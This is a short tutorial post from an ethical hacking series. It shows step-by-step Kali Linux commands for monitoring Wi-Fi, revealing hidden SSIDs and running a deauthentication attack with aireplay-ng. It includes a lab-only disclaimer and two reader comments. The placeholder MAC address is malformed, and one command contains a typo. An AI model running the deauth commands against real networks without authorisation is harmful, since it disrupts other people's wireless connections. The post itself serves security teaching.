Ethical Hacking with Kali Linux – Part 2: Finding Hidden SSIDS

March 29, 2016 | Views: 47027

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Ethical Hacking with Kali Linux – Part 2:  Finding Hidden SSIDS

>> Welcome all, to this series of Kali Linux for Ethical Hacking. This is second part and we’ll be seeing some of the techniques of uncovering hidden SSIDs.


# Process

– Enabling Wireless Monitoring : airmon-ng

– Discovering the APs (Access Points) : airodump-ng

– Stay calm for Association or use de-authentication : aireplay-ng


# . . . Let’s Begin

– Before start, make sure that you have eth0, lo, wlan0 are in action. (go to terminal and run ifconfig)

– Let’s start to monitor on that wireless interface, run:

airmon-ng start wlan0

– After executing above command, we must get a new interface mon0 (monitor mode enabled)

– Verify that both interfaces are up and running, run:


– Watch for wlan0 and mon0, run:

airodump-ng mon0

– For monitoring all the APs that Kali Linux OS can find out.

– From next step, note BSSID and ESSID, if there is any hidden SSID, then ESSID will be format like this : <length: 0> [Notice, it’s CH (Channel) and BSSID]

– CTRL+C (press)

airodump-ng -c 1 mon0
(Here, 1 is channel we notice/you notice. This value may differ.)

– After some time, you will notice <length: 0> changes and reveals SSID name.

– If it takes lot of time to reveal SSID, we can follow de-authenticate process by cloning next terminal in Kali Linux.

– Copy BSSID (MAC) of ch 1


#Deauth Attack:

aireplay-ng -0 2 -a 00:A1:B2:11:20:13:5T mon0

– It sends de-auth to broadcast

airodump-ng -c i mon0

– Wait

– Go over to new Terminal

aireplay-ng -0 2 -a 00:A1:B2:11:20:13:5T mon0

– Finally you will get SSID in ESSID section.


A quick note: This series is only for educational purpose. Practice this series in a lab, in a virtual/separate network and always avoid illegal activities. If you can, then support us in fighting the bad guys.

See the other posts in this series:

Ethical Hacking with Kali Linux – Part 1: Objective
Ethical Hacking with Kali Linux – Part 3: Bypassing Mac Address Filter
Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless
Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points
Ethical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)

By: Bijay Acharya (





Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
  1. Good Day,

    I don’t get mon0 after running airomon-ng start wlan0

    I get wlan0mon instead on the interface

    • It’s the exact same thing I believe……I also get wlan0mon instead of mon0 for some thing…….But I have found it to work all the time……The experts can tell better.

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge


We recommend always using caution when following any link

Are you sure you want to continue?